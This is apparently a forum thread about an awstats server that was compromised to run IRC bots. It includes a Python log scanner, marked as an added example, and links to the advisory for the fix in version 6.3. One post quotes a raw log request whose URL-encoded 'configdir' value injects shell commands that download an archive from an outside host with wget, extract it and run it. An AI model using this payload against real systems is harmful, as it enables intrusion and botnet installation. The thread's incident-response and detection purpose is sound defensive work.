2 weeks running awstats on my linux server and I am hacked.
Somebody managed to get a perl script into awstats and oops, my server is supporting 12 irc bots.
I don't think it necessarily means awstats was the entry point. Maybe the person already had ftp access and the awstats cgi-bin was the place where the hacker had exec permissions. If he was dumb enough it is possible he left the logs intact. Did you find anything there?
awstats.pl can be used to drop IRC-Bots using the "configdir" argument.
I just discovered so.
"GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20www%2eirc%2dbots%2eorg%2fx%2etar%2egz%3btar%20xvzf%20x%2etar%2egz%3bcd%20x%3b%2e%2fcrond%3becho%20e_exp%3b%2500 HTTP/1.1"
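One way to run the log check discussed in this thread, as an added example that is not part of any poster's message or of the awstats project: a Python scan that flags access-log requests to awstats.pl whose "configdir" parameter, once percent-decoded, is anything other than a plain path. The sample log lines, addresses and function names are constructed for illustration.

```python
import re

# Request line as it appears inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A legitimate configdir is a plain filesystem path; anything else is suspect.
SAFE_PATH_RE = re.compile(r'[A-Za-z0-9_./-]*')
PERCENT_RE = re.compile(r'%([0-9A-Fa-f]{2})')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double encoding (e.g. %2500) is unwrapped."""
    for _ in range(max_rounds):
        decoded = PERCENT_RE.sub(lambda m: chr(int(m.group(1), 16)), value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_configdir(log_line):
    """Return the decoded configdir value if it is not a plain path, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    # Split by hand: the request in this thread starts with "//", which URL
    # parsers would misread as a host name.
    path, _, query = m.group(1).partition("?")
    if not path.endswith("awstats.pl"):
        return None
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if fully_decode(name).lower() == "configdir":
            value = fully_decode(raw.replace("+", " "))
            if not SAFE_PATH_RE.fullmatch(value):
                return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = ((n, suspicious_configdir(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in hits if v is not None]

# Constructed sample entries (documentation addresses, harmless payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Feb/2005:10:00:00 +0000] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Feb/2005:10:00:05 +0000] "GET /cgi-bin/awstats.pl?config=example.org&configdir=/etc/awstats HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Feb/2005:10:02:11 +0000] "GET //cgi-bin/awstats.pl?configdir=%7cecho%20test%3b%2500 HTTP/1.1" 200 312',
]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: configdir decodes to {value!r}")
```

A hit only shows that the request was received; whether it executed depends on the installed awstats version and on what else is found on the host.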
This is a vulnerability which was fixed in version 6.3 of awstats.
http://www.kb.cert.org/vuls/id/272296
http://msmvps.com/harrywaldron/archive/2005/02/09/35409.aspx
http://www.ypjain.com/simplesecurity/2005/02/awstats-security-hole.html
http://www.ypjain.com/simplesecurity/2005/02/awstats-security-hole-update.html